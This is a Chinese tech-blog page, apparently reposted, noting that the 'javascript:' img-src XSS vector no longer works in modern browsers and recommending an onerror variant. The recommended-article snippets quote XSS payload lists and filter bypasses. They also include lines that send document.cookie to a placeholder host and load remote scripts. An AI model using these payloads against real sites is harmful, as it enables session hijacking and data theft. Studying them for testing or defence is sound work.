<img src="javascript:alert(/xss/)">已经慢慢过时了的

最新推荐文章于 2025-07-11 23:02:31 发布
转载 最新推荐文章于 2025-07-11 23:02:31 发布 · 604 阅读 · 0

我在一年前就发现类似<img src="javascript:alert(/xss/)">这种语句已经不能在IE7.0以上和火狐运行,而旧版的遨游和其他的一些IE内核浏览器还可以,估计是被开发人员故意封掉的。随着浏览器的更新换代,这种语句的成功率越来越低,我在网上找到一些新文章仍还是在使用。
建议还是早点习惯<img src="x"/**/onerror=javascript:xxxx>吧,这种方式绝大部分浏览器都可以执行。。
Web开发中Chrome DevTools攻略(深入理解和利用开发者工具、元素面板和控制台、网络和资源面板、应用和源代码面板等等)
半夏微凉科技
05-17 1649
Chrome开发者工具(DevTools)是Web开发中不可或缺的利器,它提供了一系列强大的功能,帮助开发人员调试、优化和审查网页。本文将深入探讨Chrome DevTools的各种功能和技巧,帮助你更好地利用这个工具来提升你的Web开发技能。
testXSS <img src="aa" onerror="javascript:alert('XSS');"/>
weixin_30329623的博客
05-07 157
adsa </p><img src="aa" onerror="javascript:alert('XSS');"/><p> 转载于:https://www.cnblogs.com/kuiyeit/p/6822093.html
javascript动态绑定img的src地址
abc1092008823的博客
10-02 3267
今天写了这么一段段代码:就是img标记中的scr地址需要调用javascript函数动态的绑定,起初写法如下:<img src="javascript:functionName()"> 浏览页面的时候却发现scr还是“javascript:functionName()” ,并不是函数返回的值,也就是说没有执行函数。 网上搜了一下有人写要写成这样<img src=...
html5+%3cimg+src,<script>alert(123)</script> <script>alert("hellox worldss");</script> javascript:al...
weixin_39728221的博客
06-15 409
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//-->">'>alert(String.fromCharCod...
xss测试语句大全
hualusiyu的专栏
01-02 3122
'>alert(document.cookie) ='>alert(document.cookie) alert(document.cookie) alert(vulnerable) %3Cscript%3Ealert('XSS')%3C/script%3E alert('XSS') XSS')"> %0a%0aalert(\"Vulnerable\").jsp
XSS-labs靶场(超详解)1-20关——附原码
2201_76115387的博客
08-01 1793
alert(1)</script>,代码将变为echo "<h2 align=center>欢迎用户"<script>alert(1)
PHP后端开发:最新XSS防御技术深度剖析与实现
架构师的AI之路,分享AI应用开发架构的学习与实践。
07-11 350
跨站脚本攻击(XSS)作为Web应用最常见且危害巨大的安全威胁之一,长期位居OWASP Top 10榜单前列。本文将带领PHP开发者深入探索XSS攻击的本质与最新防御技术,从原理剖析到实战编码,构建全方位的XSS防御体系。我们将系统讲解输入验证、输出编码、CSP策略等核心防御手段,并通过真实案例展示如何在PHP项目中落地实施这些安全措施。无论你是初涉Web安全的开发者,还是寻求提升系统安全性的架构师,本文都将为你提供一套完整的XSS防御解决方案,助你构建真正安全可靠的PHP应用。
搭建apache网站服务,php环境,网站有个文件,有输入框,当xss绕过滤成功后(简单绕过),能编写符合要求的xss语句
最新发布
07-21
<img src=x onerror=alert("XSS")> <!-- 利用图片加载错误触发 --> <svg/onload=alert(document.domain)> <!-- SVG标签触发 --> ``` #### 2. **窃取Cookie的语句** ```html <script> fetch('...
【安全性挑战】:6种XSS攻击防御策略,保护你的iframe
本文首先概述了XSS攻击及其对系统的潜在影响,然后介绍了XSS攻击的类型、原理、载荷构造及执行机制。接着,文章强调了XSS攻击的检测与预防的重要性,并详细探讨了基础和高级的防御策略,包括输入验证、输出编码、...
XSS漏洞-常见标签
weixin_61143354的博客
09-17 1868
网络安全笔记
XSS(跨站脚本攻击)理论知识
ZDZA_的博客
01-03 1275
XSS Ex01 什么是XSS? 跨站点脚本(XSS)是向真实网站添加恶意代码以便恶意收集用户信息的过程。XSS攻击可能通过Web应用程序中的安全漏洞进行,并且通常通过注入客户端脚本来利用,简单来说就是通过非法途径获取用户的cookie来进行恶意登陆。 Ex02 XSS测试平台 这是一个免费的XSS测试平台 http://www.l31.cc/index.php XSS测试平台也可以自行搭建,...
XSS 绕过常用语句
Mr.Huang_的博客
09-16 4777
XSS 绕过常用语句 写在最前面::: 下文中 alert 都可以由 prompt 代替 最常用的 XSS 漏洞测试代码: <script>prompt("XSS")</script> <SCRIPT SRC=http://damit5.ml/xss.js></SCRIPT> 在输入(Input)标签里 <INPUT type="text" value='<SCRIPT>alert("XSS")</SCRIPT>'>
XSS漏洞-03】XSS漏洞语句构造和绕过方法实例
m0_64378913的博客
05-14 4833
目录1 XSS语句构造方式1.1 第一种:利用[<>]构造HTML/JS语句1.2 第二种:利用javascript:伪协议1.3 第三种:事件驱动1.4 第四种:利用CSS(层叠样式脚本)1.5 其他标签及手法2 XSS语句变形及绕过2.1 第一种:大小写混编2.2 第二种:**双写绕过**。2.3 第三种:**引号的使用**2.4 第四种:使用 [/] 代替空格2.5 第五种:在一些关键字内插入回车符与Tab符2.6 第六种:编码绕过2.7 第七种:拆分跨站2.8
XSS攻击绕过方法大全,XSS攻击技巧,收集100种绕过方法分享(2024最新)
白帽黑客八哥的博客
12-12 1万+
尽管许多网站实施了输入过滤措施来防止跨站脚本(XSS)攻击,但在特定条件下,经过精心编码的脚本仍有可能实施XSS注入。本文旨在为专业的安全测试人员提供一个跨站脚本漏洞的检测指南。
浅析XSS(Cross Site Script:跨站式攻击)漏洞原理(转)
测试开发这些事
02-09 3338
 近一些人频频在博客里炫耀说黑了某某门户网站,发现了某某大站的漏洞,竟然还要收取发现漏洞的费用,仔细瞧了一瞧,全是一片噼里啪啦alert消息框的截图,只是简单的触发了XSS,心痒难耐,于是写了这篇拙文道出我对跨站脚本漏洞原理的一些理解。    如果你还不知道什么是XSS,我来帮助解释一下,XSS的全称是Cross Site Scripting,意思是跨站脚本.这第一个单词是Cross,为什么缩写成
XSS(跨站脚本攻击)详解
热门推荐
谢公子的博客
09-08 7万+
目录 XSS的原理和分类 XSS的攻击载荷 XSS可以插在哪里? XSS漏洞的挖掘 XSS的攻击过程 XSS漏洞的危害 XSS漏洞的简单攻击测试 反射型XSS: 存储型XSS: DOM型XSSXSS的简单过滤和绕过 ​XSS的防御 反射型XSS的利用姿势 get型 post型 利用JS将用户信息发送给后台 XSS的原理和分类 跨站脚本攻击XSS(Cros...
XSS的Waf绕过及工具使用(附靶场通关记录,持续更新)
m0_51468027的博客
02-01 6479
熟悉常见的waf绕过方法和工具使用,附靶场通关记录
<script src=http://xss.re/2809></script>
wo871329的专栏
02-28 603
<img src=1 onerror=alert(/xss/)>
07-12
在测试 XSS(跨站脚本攻击)漏洞时,payload 的选择和构造至关重要。以下是一些常见的 XSS payload 及其使用方式,适用于不同场景下的测试与验证。 ### 基础测试 Payload 用于初步确认是否存在 XSS 漏洞: - 最基础的脚本注入: ```html <script>alert('XSS')</script> ``` - 测试是否能够访问并弹出 cookie: ```html <script>alert(document.cookie)</script> ``` - 使用 `img` 标签触发 JavaScript(图片加载失败时执行): ```html <img src="x" onerror="alert('XSS')"> ``` - 利用事件属性如 `onload` 或 `onmouseover`: ```html <body onload="alert('XSS')"> <div onmouseover="alert('XSS')">Hover me</div> ``` ### 编码绕过 Payload 用于尝试绕过简单的输入过滤机制: - HTML 实体编码绕过: ```html <script>alert('XSS')</script> ``` - URL 编码形式: ```html %3Cscript%3Ealert('XSS')%3C/script%3E ``` - 使用反引号或括号绕过: ```html <script>eval("al\u0065rt('XSS')")</script> ``` ### 复杂上下文注入 Payload 适用于特定 HTML 上下文中的注入测试: - 在属性值中注入: ```html value="test" onfocus="alert(1)" ``` - 在 CSS 上下文中注入(如 style 属性): ```html style="width: expression(alert('XSS'))" ``` - SVG 标签注入: ```html <svg onload="alert('XSS')"></svg> ``` ### 高级利用型 Payload 用于实际模拟攻击行为,如窃取 Cookie: - 将 Cookie 发送到远程服务器: ```html <script>location.href="http://xx.xx.xx.xx/flag.php?cookie="+document.cookie</script> ``` - 使用 `img` 标签异步发送 Cookie 信息: ```html <img src="#" onerror="window.location.href='http://xx.xx.xx.xx/flag.php?cookie='+document.cookie"> ``` - 利用 jQuery 加载外部脚本(需页面引入 jQuery): ```html <script>$.getScript('http://xx.xx.xx.xx/xss.js')</script> ``` ### 自动化工具辅助测试 除了手动构造 payload,还可以使用自动化工具提升测试效率和覆盖面: - **BeEF-XSS**:提供丰富的 XSS 攻击模块,支持多种浏览器控制功能。 - **XSStrike**:专注于反射型和 DOM 型 XSS 检测,内置 WAF 绕过策略[^3]。 在进行测试时,建议结合手动与自动化手段,同时注意区分测试环境与生产环境,避免造成实际危害。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值